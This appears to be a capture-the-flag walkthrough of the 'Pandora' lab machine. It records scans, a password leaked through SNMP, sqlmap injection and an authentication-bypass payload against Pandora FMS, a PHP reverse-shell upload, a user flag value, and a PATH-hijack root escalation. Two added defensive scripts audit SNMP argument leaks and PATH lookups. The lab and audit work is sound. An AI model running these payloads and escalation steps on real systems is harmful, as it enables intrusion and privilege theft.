xChar
·9 months ago

Time of record
Before noon on April 8, 2022

msf6 > db_nmap -A -sV 10.10.11.136

[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 05:30 EDT
[*] Nmap: Nmap scan report for 10.10.11.136 (10.10.11.136)
[*] Nmap: Host is up (0.36s latency).
[*] Nmap: Not shown: 997 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
[*] Nmap: | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
[*] Nmap: |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
[*] Nmap: 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
[*] Nmap: |_http-title: Play | Landing
[*] Nmap: |_http-server-header: Apache/2.4.41 (Ubuntu)
[*] Nmap: 6543/tcp filtered mythtv
[*] Nmap: Aggressive OS guesses: Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Adtran 424RG FTTH gateway (92%), Linux 3.10 (92%), Linux 5.3 - 5.4 (92%)
[*] Nmap: No exact OS matches for host (test conditions non-ideal).
[*] Nmap: Network Distance: 2 hops
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE (using port 8080/tcp)
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 360.68 ms 10.10.14.1 (10.10.14.1)
[*] Nmap: 2 360.74 ms 10.10.11.136 (10.10.11.136)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 83.95 seconds

Take a look at what's on the web page; there doesn't seem to be anything

Change approach and check for subdomains; that came up empty as well
wfuzz -c -u "http://pandora.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 33560 -H "HOST:FUZZ.pandora.htb"

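We don't know a password for the ssh port, so leave it alone for now
There doesn't seem to be anything exploitable right now (information gathering is the top priority!)
Note that the nmap scan just now covered TCP services
What about UDP services?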

nmap -sV -sC -A -sU -oN udp_result -top-ports=20 pandora.htb
[*] exec: nmap -sV -sC -A -sU -oN udp_result -top-ports=20 pandora.htb

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 05:53 EDT
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.36s latency).

Bug in snmp-win32-software: no string output.
PORT STATE SERVICE VERSION
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 4h48m20s
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 4h48m20.46s (1730046 timeticks)
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 10.10.11.136:22 10.10.14.28:56630
| TCP 10.10.11.136:22 10.10.14.32:51682
| TCP 10.10.11.136:35302 1.1.1.1:53
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.1:6010 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
| 6:
| 9:
| 10:
| 11:
| 12:
| 13:
| 14:
| 15:
| 16:
|_ 17:
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
Service Info: Host: pandora

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 359.51 ms 10.10.14.1 (10.10.14.1)
2 359.76 ms pandora.htb (10.10.11.136)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.72 seconds

Note that port 161 has SNMP open

Kali has a tool called snmpwalk
snmpwalk -v 2c pandora.htb -c public > pandora.snmp (didn't work...)

snmpwalk 10.10.11.136 -c public -v 2c (worked)

A username and password show up here
They may be for ssh, so try connecting
iso.3.6.1.2.1.25.4.2.1.5.842 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
ssh [email protected]
password:
HotelBabylon23
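
The credentials above were readable because the process argument table (hrSWRunParameters, 1.3.6.1.2.1.25.4.2.1.5) is served to anyone who knows the community string. The following audit helper is an added example, not part of the original post; the function names, the flag list and the sample rows are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): list processes whose arguments,
# as published in hrSWRunParameters (1.3.6.1.2.1.25.4.2.1.5), carry a
# credential-style flag. Reports PID and flag name only, never the value.

# Constructed sample walk output; names and secrets are placeholders.
sample_walk() {
cat <<'EOF'
iso.3.6.1.2.1.25.4.2.1.5.701 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.842 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/example_check -u svcuser -p EXAMPLE_SECRET'"
iso.3.6.1.2.1.25.4.2.1.5.910 = STRING: "--defaults-file=/etc/mysql/my.cnf"
iso.3.6.1.2.1.25.4.2.1.5.977 = STRING: "--user=backup --password=EXAMPLE_SECRET2 --host=127.0.0.1"
iso.3.6.1.2.1.25.4.2.1.4.977 = STRING: "/usr/bin/mysqldump"
EOF
}

# Reads snmpwalk text on stdin, prints "PID<TAB>flag" per exposed process.
audit_snmp_args() {
    awk -F' = STRING: ' '
    BEGIN {
        # Flags assumed to introduce a secret; extend for local tooling.
        flag = "(-p|--pass|--password|--pwd|--token|--secret)"
        # Delimiter, flag, space or "=", then a value up to a space or quote.
        re = "[^A-Za-z0-9_-]" flag "[ =][^ \"\047]+"
    }
    # Keep only hrSWRunParameters rows; the last OID component is the PID.
    $1 ~ /(\.25\.4\.2\.1\.5|hrSWRunParameters)\.[0-9]+$/ {
        n = split($1, oid, ".")
        if (match(" " $2, re)) {
            hit = substr(" " $2, RSTART + 1, RLENGTH - 1)  # drop delimiter
            sub(/[ =].*/, "", hit)                         # drop the value
            printf "%s\t%s\n", oid[n], hit
        }
    }'
}

sample_walk | audit_snmp_args
```

On a host you administer, pipe a walk of 1.3.6.1.2.1.25.4.2.1.5 into audit_snmp_args; any row it prints is a process whose secret should move out of its command line into a file or environment the SNMP agent does not publish.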

Checking the listening ports and their services shows a web service running locally
netstat -putlen
curl pandora.htb

So here is the idea: we can use port forwarding to forward port 80 on the target machine to port 80 on our own machine and access it there.

ssh -L 80:127.0.0.1:80 [email protected]
ssh -L 127.0.0.1:80:127.0.0.1:80 [email protected]
(The two commands above are equivalent; use either one)

Visit
http://127.0.0.1/pandora_console/
v7.0NG.742_FIX_PERL2020
The page shows a product name and version, so naturally Google it; a CVE turns up
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5844

https://nvd.nist.gov/vuln/detail/CVE-2020-26518#range-6019001

Found a SQL injection, so let's inject

sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tsessions_php -C id_session,data --dump

A GET parameter injection is detected here

The following information shows up here:
matt

sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tpassword_history -C id_pass,id_user,data_end,password,data_begin --dump
First, use the following PoC for the bypass
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

Then simply visit http://127.0.0.1/pandora_console/ and you are logged in with admin privileges

https://github.com/pentestmonkey/php-reverse-shell
Use this shell: save it locally first, then modify it slightly
Modify
$ip
$port

After uploading, the shell can be found at http://127.0.0.1/pandora_console/images/php-reverse-shell.php

Listen on 4444 here, which is the port set in the file
python3 -c "import pty;pty.spawn('/bin/bash')"
Use python to spawn a shell

=================================================================

The following content is not public
Contains flags

usr-flag

matt@pandora:/home/matt$ cat user.txt
cat user.txt
31877bbaf34fd1eef94ad5b501a83052
Got the user flag

Next comes privilege escalation to root; there is a lot we can do now
find / -perm -u=s -type f 2>/dev/null
/usr/bin/pkexec shows up again, but it can't be used here
There is one very odd binary
/usr/bin/pandora_backup
Download it and take a look with strings pandora_backup
matt@pandora:/home/matt$ sudo /usr/bin/pandora_backup
sudo /usr/bin/pandora_backup
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
Running it directly fails; we need a more stable shell

The key fingerprint is:
SHA256:vV7w0pxT635at4mzFf9oWutXYx4tc4hxWqYEPUnA04o matt@pandora

Generate an ssh key here

Create a new id_rsa locally
Copy the key into it

Enter the passphrase set just now here:
123456789a
ssh [email protected] -i id_rsa

cd /home/matt/
echo "/bin/bash" > tar
chmod +x tar
export PATH=/home/matt:$PATH

Then run the /usr/bin/pandora_backup file

matt@pandora:$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:
# whoami&&id
root
uid=0(root) gid=1000(matt) groups=1000(matt)
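
The steps above only work if the setuid binary runs tar by bare name, so the lookup follows the caller's PATH and the first match wins. The following check is an added example, not part of the original post; resolve_cmd, check_cmd and the TRUSTED_DIRS list are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): show which file a bare command
# name resolves to under a given PATH and flag it when the directory is not
# in a trusted, root-owned set. TRUSTED_DIRS is an assumption; adjust per host.
TRUSTED_DIRS="/usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin"

# resolve_cmd NAME PATHSTRING: print the first executable match, left to
# right, which is the order execvp() and the shell use.
resolve_cmd() {
    name=$1
    old_ifs=$IFS
    IFS=:
    for dir in $2; do
        [ -n "$dir" ] || dir=.      # an empty PATH entry means the current dir
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            IFS=$old_ifs
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    IFS=$old_ifs
    return 1
}

# check_cmd NAME PATHSTRING: print "OK <path>" (status 0), "UNTRUSTED <path>"
# (status 1) or "NOTFOUND <name>" (status 2).
check_cmd() {
    hit=$(resolve_cmd "$1" "$2") || { echo "NOTFOUND $1"; return 2; }
    for t in $TRUSTED_DIRS; do
        [ "${hit%/*}" = "$t" ] && { echo "OK $hit"; return 0; }
    done
    echo "UNTRUSTED $hit"
    return 1
}

# Demo with a constructed directory standing in for a user-writable one.
demo() {
    tmp=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho "not the real tar"\n' > "$tmp/tar"
    chmod +x "$tmp/tar"
    check_cmd tar "$tmp:/usr/bin:/bin" || true   # caller-controlled PATH
    check_cmd tar "/usr/bin:/bin" || true        # fixed PATH set by the program
    rm -rf "$tmp"
}
demo
```

A privileged program closes this off by calling its helpers by absolute path (for example /usr/bin/tar) or by setting PATH itself to trusted directories before running anything.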


=================================================================

root-flag

root@pandora:/root# cat root.txt


End time
April 8, 2022, 18:26:30
